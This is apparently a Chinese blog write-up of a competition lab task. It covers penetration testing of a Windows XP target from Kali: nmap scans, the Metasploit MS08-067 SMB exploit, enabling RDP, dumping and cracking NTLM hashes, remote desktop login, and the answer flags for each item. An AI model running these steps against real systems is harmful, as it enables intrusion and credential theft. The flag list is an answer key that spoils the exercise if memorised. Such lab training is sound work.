E120-经典赛题-Windows操作系统渗透测试

任务实施:

E120-经典赛题-Windows操作系统渗透测试

任务环境说明:

服务器场景:p9_kali-7(用户名:root;密码:toor)

服务器场景操作系统:Kali Linux  192.168.1.102

服务器场景:p9_xp-2(用户名:administrator;密码:pan123yun456)

服务器场景操作系统:Windows(版本不详)  192.168.1.108

网络拓扑

操作过程

        通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行操作系统扫描渗透测试,并将该操作显示结果“Running:”之后的字符串作为FLAG提交

nmmap -O 192.168.1.108

根据回显结果显示,提交Running后面的字符串Microsoft Windows XP|2003

本题提交Flag:【 Microsoft Windows XP|2003

        通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行系统服务及版本扫描渗透测试,并将该操作显示结果中445端口对应的服务版本信息字符串作为FLAG提交

nmap -sV 192.168.1.108

本题提交Flag:【 Microsoft Windows XP Microsoft-ds

使用命令msfconsole启动metasplopit渗透测试平台

然后在交互界面使用命令

search ms08_067搜索smb漏洞利用模块

使用命令use exploit/windows/smb/ms08_067对该模块进行调用,然后使用命令show options查看需要配置的参数

成功获取到靶机的shell

使用命令run getgui -e或run post/windows/manage/enable_rdp模块启动目标靶机的远程桌面服务。

run getgui -e  ##适用于老版本kali

或

run post/windows/manage/enable_rdp    ##适用于新版本kali

然后使用命令hashdump导出当前管理员用户的NTLM hash值

hashdump

复制Administrator管理员的那一行,再然后打开一个新的窗口使用命令ophcrack运行hash密码破解软件:

稍等半分钟,成功解密管理员的明文密码pan123yun456

回到命令终端,使用命令rdesktop 172.16.1.12 运行远程桌面,输入用户名Administrator密码pan123yun456

rdesktop 192.168.1.108

成功进入桌面

通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行渗透测试,将该场景网络连接信息中的DNS信息作为FLAG提交;(例如114.114.114.114) 

ipconfig /all

本题提交Flag:【 123.125.81.6

        通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行渗透测试,将该场景桌面上111文件夹中唯一一个后缀为.docx文件的文件名称作为FLAG提交; 

文件名称为ksxwob.docx

本题提交Flag:【 ksxwob.docx

        通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行渗透测试,将该场景桌面上111文件夹中唯一一个后缀为.docx文件的文档内容作为FLAG提交; 

本题提交Flag:【 ytgzksel

        通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行渗透测试,将该场景桌面上222文件夹中唯一一个图片中的英文单词作为FLAG提交

本题提交Flag:【  eternity  】

通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行渗透测试,将该场景中的当前最高账户管理员的密码作为FLAG提交; 

管理员的密码:pan123yun456

本题提交Flag:【   pan123yun456 

        通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行渗透测试,将该场景中回收站内文件的文档内容作为FLAG提交。

本题提交Flag:【  ncuiwerx  】

实验结束,关闭虚拟机。

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

孪生质数-希灵Sec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值